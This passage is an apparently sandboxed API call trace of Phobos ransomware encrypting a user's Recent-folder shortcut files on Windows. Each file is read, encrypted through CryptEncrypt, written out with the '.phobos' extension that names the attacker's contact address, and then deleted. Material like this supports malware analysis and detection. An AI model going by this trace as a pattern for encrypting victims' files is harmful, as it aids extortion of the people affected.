CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tPfoYySpv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tpfoyyspv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.440] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.440] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.440] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf1f, lpOverlapped=0x0) returned 1 [0201.442] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20, dwBufLen=0xf20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf20) returned 1 [0201.442] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf20, lpOverlapped=0x0) returned 1 [0201.443] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.443] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.443] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.443] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.443] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.443] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.443] CloseHandle (hObject=0xfc) returned 1 [0201.443] CloseHandle (hObject=0x174) returned 1 [0201.443] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\tPfoYySpv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tpfoyyspv.lnk")) returned 1 [0201.444] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TZT75yw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tzt75yw.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.445] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=2582) returned 1 [0201.445] CloseHandle (hObject=0x174) returned 1 [0201.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TZT75yw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tzt75yw.lnk")) returned 0x20 [0201.445] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TZT75yw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tzt75yw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TZT75yw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tzt75yw.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.445] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.445] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.445] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TZT75yw.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tzt75yw.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.446] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.446] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.446] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa16, lpOverlapped=0x0) returned 1 [0201.447] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa20, dwBufLen=0xa20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa20) returned 1 [0201.447] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa20, lpOverlapped=0x0) returned 1 [0201.448] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.448] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.448] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.448] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.448] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.448] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.448] CloseHandle (hObject=0x174) returned 1 [0201.448] CloseHandle (hObject=0xfc) returned 1 [0201.448] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\TZT75yw.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\tzt75yw.lnk")) returned 1 [0201.449] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T_-3t.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t_-3t.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.450] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=5165) returned 1 [0201.450] CloseHandle (hObject=0xfc) returned 1 [0201.450] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T_-3t.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t_-3t.lnk")) returned 0x20 [0201.450] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T_-3t.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t_-3t.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.450] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T_-3t.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t_-3t.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.451] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.451] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T_-3t.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t_-3t.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.452] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.452] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.452] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x142d, lpOverlapped=0x0) returned 1 [0201.453] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1430, dwBufLen=0x1430 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1430) returned 1 [0201.453] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1430, lpOverlapped=0x0) returned 1 [0201.454] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.454] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.454] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.454] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.454] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.454] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.454] CloseHandle (hObject=0xfc) returned 1 [0201.454] CloseHandle (hObject=0x174) returned 1 [0201.454] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\T_-3t.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\t_-3t.lnk")) returned 1 [0201.455] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u01pCZoo__EQA46.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u01pczoo__eqa46.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.456] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=6759) returned 1 [0201.456] CloseHandle (hObject=0x174) returned 1 [0201.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u01pCZoo__EQA46.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u01pczoo__eqa46.lnk")) returned 0x20 [0201.456] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u01pCZoo__EQA46.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u01pczoo__eqa46.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u01pCZoo__EQA46.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u01pczoo__eqa46.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.457] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.457] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.457] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u01pCZoo__EQA46.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u01pczoo__eqa46.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.458] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.458] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.458] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1a67, lpOverlapped=0x0) returned 1 [0201.459] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a70, dwBufLen=0x1a70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1a70) returned 1 [0201.459] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1a70, lpOverlapped=0x0) returned 1 [0201.460] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.460] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.460] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.460] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.460] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.460] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.460] CloseHandle (hObject=0x174) returned 1 [0201.460] CloseHandle (hObject=0xfc) returned 1 [0201.460] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u01pCZoo__EQA46.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u01pczoo__eqa46.lnk")) returned 1 [0201.461] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u91GP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u91gp.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.462] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=8320) returned 1 [0201.462] CloseHandle (hObject=0xfc) returned 1 [0201.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u91GP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u91gp.lnk")) returned 0x20 [0201.462] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u91GP.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u91gp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u91GP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u91gp.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0201.462] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.462] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u91GP.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u91gp.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.463] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0201.463] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.463] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x2080, lpOverlapped=0x0) returned 1 [0201.582] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2090, dwBufLen=0x2090 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x2090) returned 1 [0201.582] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x2090, lpOverlapped=0x0) returned 1 [0201.583] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32928) returned 1 [0201.583] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.583] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.583] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.583] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.583] CryptDestroyKey (hKey=0xa32a28) returned 1 [0201.583] CloseHandle (hObject=0xfc) returned 1 [0201.583] CloseHandle (hObject=0x174) returned 1 [0201.583] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\u91GP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\u91gp.lnk")) returned 1 [0201.584] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\veaj0CBQm33.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\veaj0cbqm33.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.585] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=584) returned 1 [0201.585] CloseHandle (hObject=0x174) returned 1 [0201.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\veaj0CBQm33.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\veaj0cbqm33.lnk")) returned 0x20 [0201.585] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\veaj0CBQm33.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\veaj0cbqm33.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\veaj0CBQm33.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\veaj0cbqm33.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.585] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.585] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\veaj0CBQm33.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 